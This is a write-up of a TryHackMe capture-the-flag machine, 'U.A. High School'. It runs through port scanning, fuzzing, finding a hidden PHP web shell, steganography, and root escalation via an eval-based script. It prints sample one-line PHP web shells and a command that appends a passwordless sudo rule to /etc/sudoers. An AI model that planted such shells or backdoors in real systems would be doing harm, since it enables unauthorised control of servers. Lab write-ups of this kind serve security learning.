THM-U.A. High School-Writeup
Welcome to the web application of U.A., the Superhero Academy.
Motivation
I randomly thought to do THM on Friday over the weekend and saw a new machine had been released a few hours ago, and that too with the name U.A. High. As an anime lover I had to do this machine, right :) so I started the machine, configured the VPN and got going.
Enumeration
Enumeration is the key!!
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 58:2f:ec:23:ba:a9:fe:81:8a:8e:2d:d8:91:21:d2:76 (RSA)
| 256 9d:f2:63:fd:7c:f3:24:62:47:8a:fb:08:b2:29:e2:b4 (ECDSA)
|_ 256 62:d8:f8:c9:60:0f:70:1f:6e:11:ab:a0:33:79:b5:5d (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: U.A. High School
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Pretty much standard ports.
Fuzzing
I found an assets directory, which had pretty much nothing in it.
After further fuzzing I ended up finding an index.php which was just a blank page,
so I initially thought to leave it.
So after fuzzing everything with every wordlist from SecLists I thought I might have missed something and came back to index.php, which was a completely blank white page.
So I figured it could be a web shell, which is a very common pattern and generally has a line of code like the ones below.
<?php echo passthru($_GET['cmd']); ?>
<?php echo exec($_POST['cmd']); ?>
<?php system($_GET['cmd']); ?>
<?php passthru($_REQUEST['cmd']); ?>
So I quickly tried passing a cmd parameter as with a web shell, and boom!!
The response was encoded, and if you have been playing CTFs you might know that if there is ==
at the end it's base64 most of the time. So now I had command execution.
FootHold
Now it's time for a reverse shell, right? I generally use revshells.com
by 0day because it's the quickest way, right :) (no need to remember the code).
Now I have a foothold.
I did some extra stuff to make things stable and better; that part is up to you.
Privilege Escalation
As of now I was only the www
user, so I started searching through the directories and exploring files. I could have used linpeas.sh, but since it was an easy machine I thought to do it manually.
I found a jpg and downloaded the file. The file was corrupted at first, so I had to fix it with hexedit or any similar tool.
I used the tool https://github.com/Haxrein/MagicBytes which is actually a pretty cool tool to fix a corrupted jpg file. You can do it manually with hexedit too; check https://en.wikipedia.org/wiki/List_of_file_signatures .
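As an added example (not from the writeup or the MagicBytes tool), here is a small Python check that identifies a file from its magic bytes and restores the JPEG SOI/APP0 marker when only the leading header bytes were overwritten; the sample bytes are constructed.

```python
"""Identify a file by its magic bytes and repair a JPEG whose header was overwritten.

Constructed example: the first four bytes (SOI + APP0 marker) are zeroed, but the
'JFIF' identifier at offset 6 and the EOI marker at the end still show what it is.
"""
from typing import Optional

# Well-known signatures, taken from the Wikipedia list of file signatures.
SIGNATURES = {
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
    "pdf": b"%PDF-",
}

JPEG_SOI = b"\xff\xd8\xff"   # Start Of Image, followed by an APPn marker byte
JPEG_EOI = b"\xff\xd9"       # End Of Image


def identify(data: bytes) -> Optional[str]:
    """Return the format whose magic bytes match the start of data, else None."""
    for name, magic in SIGNATURES.items():
        if data.startswith(magic):
            return name
    return None


def looks_like_jpeg_body(data: bytes) -> bool:
    """Heuristic: a JFIF/Exif segment identifier at offset 6, or the EOI marker at the end."""
    return data[6:10] in (b"JFIF", b"Exif") or data.endswith(JPEG_EOI)


def repair_jpeg_header(data: bytes) -> bytes:
    """Restore SOI plus the APP0 (JFIF) or APP1 (Exif) marker when the body looks like a JPEG.

    Data with a valid signature, or with nothing JPEG-like in its body, is returned
    unchanged so that a non-JPEG is never 'fixed' into a fake JPEG.
    """
    if identify(data) is not None or not looks_like_jpeg_body(data):
        return data
    app_marker = b"\xe1" if data[6:10] == b"Exif" else b"\xe0"
    return JPEG_SOI + app_marker + data[4:]


if __name__ == "__main__":
    # Constructed sample: SOI/APP0 bytes zeroed, remaining JFIF header and EOI intact.
    corrupted = b"\x00\x00\x00\x00\x00\x10JFIF\x00\x01\x01" + b"\x00" * 8 + JPEG_EOI
    print(identify(corrupted))                      # None
    print(identify(repair_jpeg_header(corrupted)))  # jpeg
```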
After fixing the jpg I got this cool Deku image.
It couldn't be only that, right? So I used steghide
to look for a hidden file within the jpg. But it required a passphrase to extract it.
After enumerating more in each directory I ended up getting a passphrase.txt file which actually contained a base64-encoded password. I guess I could have easily got this if I had used linpeas.sh.
I used the password to extract the hidden txt file, which held the credentials of the deku user.
Since I now had credentials, I SSHed in as the deku user.
Local Privilege Escalation
The first step was to check sudo -l,
right, because why not, since we have the credentials of the deku user.
I found /path/feedback.sh which the deku user can run as root.
When I read the feedback.sh file it was entirely vulnerable, and I quickly found a way to use it for escalation.
If you look at the eval call, it actually executes its input as a shell command, so basically I could write files as root.
Since I can write any file as root by exploiting feedback.sh, the quickest possible way is to add our current user deku
to the sudoers file, which means deku can run anything through sudo and has all the same rights as the root user.
Command: deku ALL=NOPASSWD: ALL >> /etc/sudoers
Now when I did sudo -l
you can see I have full root privileges, so I could do anything as root. But for the POC I had to cat /root/root.txt.
Now I can just do sudo su
to switch to the root
user in this case and grab the root flag.